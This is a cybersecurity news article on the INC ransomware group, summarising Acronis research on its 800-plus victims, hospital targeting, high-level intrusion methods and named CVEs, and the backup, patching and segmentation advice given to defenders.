INC Ransomware Thrives by Mastering the Basics, Claims Over 800 Victims Since 2023
Acronis analysis reveals INC ransomware has claimed over 800 victims since 2023 by focusing on proven intrusion methods and aggressive victim selection, filling the void left by LockBit and ALPHV/BlackCat.
The INC ransomware group has emerged as one of the most active ransomware-as-a-service (RaaS) operations, claiming more than 800 victims since its debut in 2023. According to a new analysis from the Acronis Threat Research Unit (TRU), the group's success stems not from novel malware or groundbreaking techniques, but from mastering the basics: aggressive victim selection, rapid affiliate scaling, and reliance on proven intrusion methods. INC has particularly benefited from the shutdown of ALPHV/BlackCat and the disruption of LockBit, filling a power vacuum in the ransomware ecosystem alongside other ascendant groups like The Gentlemen.
INC operates as a double extortion ransomware actor, encrypting victim data and threatening to leak stolen information unless a ransom is paid. The group targets a wide range of sectors, including manufacturing, legal services, healthcare, technology, construction, and education. However, it shows a distinct preference for organizations with highly sensitive data, such as healthcare providers, where operational disruption creates immediate pressure to restore systems. High-profile victims include NHS Dumfries & Galloway in Scotland and Alder Hey Children's Hospital in Liverpool, England.
The group's intrusion methods are straightforward but effective: spearphishing, purchasing valid account credentials from initial access brokers, and exploiting well-known vulnerabilities. Among the CVEs leveraged by INC are CVE-2025-5777 (Citrix Bleed 2), CVE-2024-57727 (SimpleHelp RMM), CVE-2023-3519 (Citrix Netscaler), and CVE-2023-48788 (Fortinet EMS). Once inside a network, INC uses standard discovery tools like Advanced IP Scanner and netscan, steals credentials via base64-encoded scripts, and employs living-off-the-land binaries for lateral movement. Evasion is achieved through EDR killers and commercial remote access tools for command and control.
INC's malware comes in two versions—Windows and Linux/ESXi—both recently rewritten in Rust, a language that makes reverse engineering more difficult and simplifies cross-platform development. While the malware's capabilities (process killing, encryption, credential theft) are not novel, they are functional. The quality of the code is evidenced by its sale to at least three other threat actors in 2024, including the Lynx and Sinobi ransomware groups, which are believed to use strains of INC's malware.
Santiago Pontiroli, threat intelligence research lead at Acronis, told Dark Reading that INC's growth can be attributed to three factors: unusually aggressive victim selection, rapid affiliate scaling, and a focus on proven intrusion methods that maximize volume rather than technical innovation. "What makes INC particularly effective is its focus on sectors where disruption creates immediate pressure to restore operations," he said. "These types of organizations often hold sensitive data and face significant operational consequences when systems are disrupted, creating strong leverage for extortion."
INC's rise has been reflected in victim count rankings. According to Adam Darrah, VP of intelligence at ZeroFox, INC broke into the global top five for the first time in Q1 2026, with 124 incidents behind Qilin (338), Akira (197), and The Gentlemen (192), but ahead of Cl0p. Darrah noted that INC's trajectory has been uneven, with a contraction in late 2025 followed by a Q1 2026 surge, likely reflecting affiliate churn and re-consolidation rather than sustained organic growth. Nonetheless, its Q1 numbers suggest it is attracting affiliate volume at a competitive rate.
Acronis's blog post includes YARA rules and indicators of compromise to help defenders detect INC activity. The researchers recommend organizations adopt a 3-2-1 backup rule (three copies of data on two different media types, with one copy stored offsite), ensure backups are offline or immutable and regularly tested, use endpoint and ransomware protection tools, implement identity and access controls, stay patched, and segment networks. "Because these affiliates continue to rely on opportunistic tactics such as stolen credentials, phishing, credential reuse and exploitation of unpatched remote services, organizations should prioritize reducing external exposure and securing perimeter access points to limit the risk of intrusion," the blog post stated.
INC's success underscores a broader trend in the ransomware landscape: groups that execute basic tactics consistently can achieve significant impact, even without sophisticated malware. As Pontiroli noted, "INC has shown that a ransomware operation doesn't need novel malware to be effective. Consistently turning common intrusion techniques into a steady stream of victims across high-pressure sectors can be just as powerful."